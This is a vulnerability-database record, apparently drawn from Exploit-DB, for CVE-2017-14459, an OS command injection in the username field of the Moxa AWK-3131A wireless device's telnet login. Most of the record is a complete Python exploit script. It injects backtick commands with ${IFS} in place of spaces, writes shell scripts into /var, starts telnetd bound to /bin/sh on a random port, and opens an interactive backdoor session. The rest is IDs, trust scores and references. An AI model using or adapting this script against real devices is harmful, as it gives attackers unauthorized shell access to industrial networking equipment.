ID

VAR-E-201704-0230


CVE

cve_id: CVE-2017-14459

Trust: 1.0

sources: EXPLOIT-DB: 44398

EDB ID

44398


TITLE

Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44398

DESCRIPTION

Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection. CVE-2017-14459. Remote exploit for Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 44398

AFFECTED PRODUCTS

vendor: moxa, model: awk-3131a, scope: eq, version: 1.4<1.7

Trust: 1.6

sources: EXPLOIT-DB: 44398 // EDBNET: 97371

EXPLOIT

#!/usr/bin/env python2
import telnetlib
import re
import random
import string

# Split string into chunks, of which each is <= length
def chunkstring(s, length):
    return (s[0+i:length+i] for i in range(0, len(s), length))

# Split strings based on MAX_LEN. Encode any newlines and/or spaces.
def split_script(script):
    MAX_LEN = 28 - len('printf${IFS}"">>/var/a') - 1
    completed = []
    temp = re.split('(\n)', script)
    for content in temp:
        if len(content) != 0:
            for s in re.split('( )', content):
                if ' ' in s:
                    s = '\\x20'
                if '\n' in s:
                    s = ['\\n']
                else:
                    s = list(chunkstring(s, MAX_LEN))
                completed.append(s)

    return [item for sublist in completed for item in sublist] # Flatten nested list items

# Execute each command via the username parameter
def do_cmd(host, command):
    tn = telnetlib.Telnet(host)
    modCommand = command.replace(' ', '${IFS}') # Spaces aren't allowed, replace with ${IFS}
    tn.read_until("login: ")
    tn.write("`%s`\n" % modCommand)
    print "Sent command: %s\n modified: %s\n size: %d" % (command, modCommand, len(modCommand))
    tn.read_until("Password: ")
    tn.write(" " + "\n")
    tn.read_until("incorrect")
    tn.close()

# Write script to writable directory on host
def write_script(host, script, t_dir, t_name):
    print "[*] Writing shell script to host..."
    i = 0
    for token in split_script(script):
        carat = '>' if i == 0 else '>>'
        do_cmd(host, 'printf "%s"%s%s/%s' % (token, carat, t_dir, t_name))
        i+=1

    do_cmd(host, 'chmod +x %s/%s' % (t_dir,t_name))
    print "[*] Script written to: %s/%s\n" % (t_dir,t_name)

# Attempt to connect to newly-created backdoor
def backdoor_connect(host,port):
    print "[*] Attempting to connect to backdoor @ %s:%d" % (host, port)
    tn = telnetlib.Telnet(host, port)
    tn.interact()

def main():
    host = "192.168.127.253"
    port = random.randint(2048,4096)

    w_dir = '/var' # writable directory
    s_name = random.choice(string.ascii_uppercase) # /bin/sh launcher
    t_name = s_name.lower() # telnetd launcher

    # Need a shell launcher script to launch /bin/sh because
    # telnetd adds a '-h' option to the login command
    shell_launcher = "#!/bin/sh\nexec sh"

    # Launch telnetd with the launcher script as the login
    # command to execute
    telnetd_launcher = "#!/bin/sh\ntelnetd -p%d -l%s/%s" % (port, w_dir,s_name)

    write_script(host, shell_launcher, w_dir, s_name)
    write_script(host, telnetd_launcher, w_dir, t_name)

    # Execute telnetd script and attempt to connect
    do_cmd(host, '.%s/%s' % (w_dir,t_name))
    backdoor_connect(host, port)

if __name__ == "__main__":
    main()

Trust: 1.0

sources: EXPLOIT-DB: 44398

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 44398

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44398

TYPE

'Username' OS Command Injection

Trust: 1.6

sources: EXPLOIT-DB: 44398 // EDBNET: 97371

CREDITS

Talos

Trust: 0.6

sources: EXPLOIT-DB: 44398

EXTERNAL IDS

db: EXPLOIT-DB, id: 44398

Trust: 1.6

db: NVD, id: CVE-2017-14459

Trust: 1.0

db: TALOS, id: TALOS-2017-0507

Trust: 1.0

db: EDBNET, id: 97371

Trust: 0.6

sources: EXPLOIT-DB: 44398 // EDBNET: 97371

REFERENCES

url: https://talosintelligence.com/vulnerability_reports/talos-2017-0507

Trust: 1.0

url: https://nvd.nist.gov/vuln/detail/cve-2017-14459

Trust: 1.0

url: https://www.exploit-db.com/exploits/44398/

Trust: 0.6

sources: EXPLOIT-DB: 44398 // EDBNET: 97371

SOURCES

db: EXPLOIT-DB, id: 44398
db: EDBNET, id: 97371

LAST UPDATE DATE

2022-07-27T09:44:46.987000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB, id: 44398, date: 2017-04-03T00:00:00
db: EDBNET, id: 97371, date: 2018-04-04T00:00:00